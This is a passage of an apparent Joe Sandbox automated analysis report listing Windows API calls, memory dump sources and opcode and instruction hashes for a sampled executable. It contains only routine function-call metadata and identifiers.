                                                               • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                               • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: 58c35eb7652995ef1dcf34111037b5ff6175ee8682f9e029112ba8ca7a290458
                                                              • Instruction ID: ad6a9a9791dd0cc39b28752f2a5af0712e928dd653d1716e67cbec9b063ae236
                                                              • Opcode Fuzzy Hash: 58c35eb7652995ef1dcf34111037b5ff6175ee8682f9e029112ba8ca7a290458
                                                              • Instruction Fuzzy Hash: B8F09032605225AACF317A36AC05BAB379C9F817B5B256136FC18FB193EE60DD1091A1
                                                              APIs
                                                              • CloseHandle.KERNEL32(000000FF,?,?,00E81B28,?,?,?,?,?,00EA700F,000000FF), ref: 00E81B8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID: D+
                                                              • API String ID: 2962429428-1750190960
                                                              • Opcode ID: 11588aef9ee328d02f13e778ebaafc13aa9a977566dfa3253599aa4a4d3348f5
                                                              • Instruction ID: 35c75396089da9d89ecf77bf86910250e4a189d0562596d7298caee6b00a8c42
                                                              • Opcode Fuzzy Hash: 11588aef9ee328d02f13e778ebaafc13aa9a977566dfa3253599aa4a4d3348f5
                                                              • Instruction Fuzzy Hash: DAF0E970481701CFDB309B30C888792B3ECAB12329F042B9ED0EE629E0F361694F8700
                                                              APIs
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00E82783,?,?), ref: 00E8295F
                                                                • Part of subcall function 00E83553: _wcslen.LIBCMT ref: 00E83577
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,?,00E82783,?,?), ref: 00E82990
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: a2d85c985ba81a08c62440a231e6bbcf5bd3a0df4600188b1d5a237c54a3a62d
                                                              • Instruction ID: 165f11daceb6585a56fc762c61371c5aa2b8207fb80586ae972b814d3e288563
                                                              • Opcode Fuzzy Hash: a2d85c985ba81a08c62440a231e6bbcf5bd3a0df4600188b1d5a237c54a3a62d
                                                              • Instruction Fuzzy Hash: 6CF065351002097FEF01AF61CC41FDA37ACAF087D5F089055B94DE5060DB71DAA8DB50
                                                              APIs
                                                              • DeleteFileW.KERNEL32(000000FF,?,?,00E81CCF,?,?,00E81B21,?,?,?,?,?,00EA700F,000000FF), ref: 00E82640
                                                                • Part of subcall function 00E83553: _wcslen.LIBCMT ref: 00E83577
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E81CCF,?,?,00E81B21,?,?,?,?,?,00EA700F), ref: 00E8266E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: 21b94773a2c0c9b0785d700d67e38329e992cf998568eba34ecb2b12eacd9498
                                                              • Instruction ID: 21a95b3dab5f8bcc868acdc1f907ae1a50440f51549a1385402451d1ba9111b9
                                                              • Opcode Fuzzy Hash: 21b94773a2c0c9b0785d700d67e38329e992cf998568eba34ecb2b12eacd9498
                                                              • Instruction Fuzzy Hash: D2E09231140209AFEF01AF71DC41BD9379CAB08785F449025B949F2050EB60ED98DA54
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00EA700F,000000FF), ref: 00E8FED0
                                                              • CoUninitialize.COMBASE(?,?,?,?,00EA700F,000000FF), ref: 00E8FED5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: 0fc7c553704901d80e67c0d65eb79f104bb44bd009bbc76f9ddfd6a019b73289
                                                              • Instruction ID: 5fded6f8fc549abd35895379de336414d481018fe12f6729d5c4536833bec205
                                                              • Opcode Fuzzy Hash: 0fc7c553704901d80e67c0d65eb79f104bb44bd009bbc76f9ddfd6a019b73289
                                                              • Instruction Fuzzy Hash: 47E06572504650DFC711DB59EC45B55FBF9FB8DB20F004629F416A3761CB747801CA90
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00E92EC8
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00E92EDF
                                                                • Part of subcall function 00E905A8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E905B9
                                                                • Part of subcall function 00E905A8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E905CA
                                                                • Part of subcall function 00E905A8: IsDialogMessageW.USER32(00020482,?), ref: 00E905DE
                                                                • Part of subcall function 00E905A8: TranslateMessage.USER32(?), ref: 00E905EC
                                                                • Part of subcall function 00E905A8: DispatchMessageW.USER32(?), ref: 00E905F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 65b82c07add9b56841b3a953a4da5e50b72a8c14c78e8ae97cf89a388bd7871a
                                                              • Instruction ID: a36065d80752ef94aaaaad18f861d76353275eeb5df5ed0e97f9d3cc23ad0d7d
                                                              • Opcode Fuzzy Hash: 65b82c07add9b56841b3a953a4da5e50b72a8c14c78e8ae97cf89a388bd7871a
                                                              • Instruction Fuzzy Hash: 87E0D8B740024C7EEF01B776CC0AFEA3AECAB08785F440461B249B61B3D6B5DB158B61
                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00E826A3
                                                                • Part of subcall function 00E83553: _wcslen.LIBCMT ref: 00E83577
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00E826CF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 7d25c7b31938ce69478037bf24e792199fe13f6d57b55124abb6e4ab321e1338
                                                              • Instruction ID: 8971ef746226cf969c29e9e4233583c8b6d41d1e794aaeb3ac4a8bcd28939047
                                                              • Opcode Fuzzy Hash: 7d25c7b31938ce69478037bf24e792199fe13f6d57b55124abb6e4ab321e1338
                                                              • Instruction Fuzzy Hash: C4E092315001286BDF12BB68CC04BD977A8EB093E5F044161BE8DF3190DA71AE849BA0
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E86B62
                                                              • LoadLibraryW.KERNEL32(?,?,00E8583E,Crypt32.dll,00000000,00E858C2,?,?,00E858A4,?,?,?,?), ref: 00E86B84
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: e12b28d383177521d3eb0f7ed495f6398dac605dd4093993b48e11418f1b9967
                                                              • Instruction ID: a712a5e3117b665968f00396fcaf272ea5b9bade64508648f2ca93071b37b980
                                                              • Opcode Fuzzy Hash: e12b28d383177521d3eb0f7ed495f6398dac605dd4093993b48e11418f1b9967
                                                              • Instruction Fuzzy Hash: 55E012B24001186ADF11A7A59C48FDB77ACAB0D3D6F0400617949F2004DAB4EA888BB0
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E8F5FA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E8F601
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: 3be020d9a1edcda8e49d30ce85986cf67bfa1c97fe69561acd568a7c71456418
                                                              • Instruction ID: 47c5d34d832928b2badc1359ca6d83ae65795ac8c3aa07b133d82488b1e2e53d
                                                              • Opcode Fuzzy Hash: 3be020d9a1edcda8e49d30ce85986cf67bfa1c97fe69561acd568a7c71456418
                                                              • Instruction Fuzzy Hash: 83E0ED71900218EBCB50EF54C941699B7E8EB48364F20916AE89AB3251E6B0AF04DB91
                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E9752A
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E97535
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: 99da603689f40cd49a0a7848d65e8e849e7035d63eaabaa714da9ad4f4e94972
                                                              • Instruction ID: 5f6a67ef15019536a21fb9d195e373d43b5e0ca68f8fe08f1234bfc234370342
                                                              • Opcode Fuzzy Hash: 99da603689f40cd49a0a7848d65e8e849e7035d63eaabaa714da9ad4f4e94972
                                                              • Instruction Fuzzy Hash: 59D0A92482C3019CCF802AB13E0249B23C019027787A23396E8B0FA1E2EE20880C686A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: a570a255c9b1ee4b0a772d7fba6a190a8197edadd0e5895f06372e4c704dc753
                                                              • Instruction ID: 609bfc66641c64f53cc3404a67fd0e82f2f5b16cc0071da06711043ecf46f214
                                                              • Opcode Fuzzy Hash: a570a255c9b1ee4b0a772d7fba6a190a8197edadd0e5895f06372e4c704dc753
                                                              • Instruction Fuzzy Hash: 4FC01272059286BECB015BB2DC0DC2ABBE8ABA8212F12C908F0A5D10A1C238C414DB11
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00E811B1
                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00E811B8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallbackDispatcherItemUser
                                                              • String ID:
                                                              • API String ID: 4250310104-0
                                                              • Opcode ID: 6735f4742d194c8a21f34017e83389397539b5d6b4a1bd3cd9e0a0bbf28af6a2
                                                              • Instruction ID: aa7cbd1d1c9ca4216386809364086f9c900abec0ad991739ec0ae295e9673e9d
                                                              • Opcode Fuzzy Hash: 6735f4742d194c8a21f34017e83389397539b5d6b4a1bd3cd9e0a0bbf28af6a2
                                                              • Instruction Fuzzy Hash: FCC04C76409285BFCB019BA19D4CC2FBFF9AB94311F12C809B1A595061C6358414DB11
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __allrem
                                                              • String ID:
                                                              • API String ID: 2933888876-0
                                                              • Opcode ID: 494f8aabe7dc8206cc470379c2152c5dbceb2f7621ec16e0c35f418d3132d4e5
                                                              • Instruction ID: 08c3f003b2ec3f7a121803e21a8eda9f3b9c18f894aeaceab20084157328d0d8
                                                              • Opcode Fuzzy Hash: 494f8aabe7dc8206cc470379c2152c5dbceb2f7621ec16e0c35f418d3132d4e5
                                                              • Instruction Fuzzy Hash: 87319471609610CFDB15DF2AFC54E2977A5B78C724B19413AE909F7360D733AC0A8B91
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00E9F678
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: b138158480d790220c60f1c06feb04ccf507c5d805afc2affba74b7ecbfc2d48
                                                              • Instruction ID: 1d96a89db1e7b0b4370df0a8f63ee05cd800183b63a3afe39c01d99d16fc885c
                                                              • Opcode Fuzzy Hash: b138158480d790220c60f1c06feb04ccf507c5d805afc2affba74b7ecbfc2d48
                                                              • Instruction Fuzzy Hash: 7C11E333A11724AF9F22DE29EC8189A7395AB843647160230FC15FB369DB30EC4586D1
                                                              APIs
                                                                • Part of subcall function 00E9FAB6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E9E133,00000001,00000364,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9FAF7
                                                              • _free.LIBCMT ref: 00EA0E65
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 35e40875278c51e33762d8e5a3ae066d161879bcf4843a14a00897b1f4e9131f
                                                              • Instruction ID: 524e1cd1974cbf660ee3f139cbd8cdfa1c6f8c02041196d343e8cf1242f18395
                                                              • Opcode Fuzzy Hash: 35e40875278c51e33762d8e5a3ae066d161879bcf4843a14a00897b1f4e9131f
                                                              • Instruction Fuzzy Hash: 9201D6722003496BEB258E65D88595AFBD9EB8A370F25092DE594A7280EA30AC05C764
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E92A97
                                                                • Part of subcall function 00E869E4: _wcslen.LIBCMT ref: 00E869FA
                                                                • Part of subcall function 00E8DC56: __EH_prolog.LIBCMT ref: 00E8DC5B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              • Opcode ID: d4795e14cc4fd4967d1453c1e962a02de4d5d060ae4bd67c0cda1a2711ea5eb2
                                                              • Instruction ID: 2fa33e66f54ed64af7774fb23e5bac2069c4d756a79d2ced263948f294450efe
                                                              • Opcode Fuzzy Hash: d4795e14cc4fd4967d1453c1e962a02de4d5d060ae4bd67c0cda1a2711ea5eb2
                                                              • Instruction Fuzzy Hash: B201D87250A380AED701AB69FC037597FE1E755314F10601BE448763A3E7F51549C721
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E9E133,00000001,00000364,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9FAF7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: fe679f52e6ed1bc355ecbd805a24c138d7314f56fcfd49cce356047c6c5b0c67
                                                              • Instruction ID: 0636605c40f298244ca53c897e4d5b4613dc505d3201d4ac42be966f74860db7
                                                              • Opcode Fuzzy Hash: fe679f52e6ed1bc355ecbd805a24c138d7314f56fcfd49cce356047c6c5b0c67
                                                              • Instruction Fuzzy Hash: A3F0E931604224AADF315E22EC15B9B3788EF417B4B1DA031FC08F6194DAB0DC0082E0
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00E985C4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
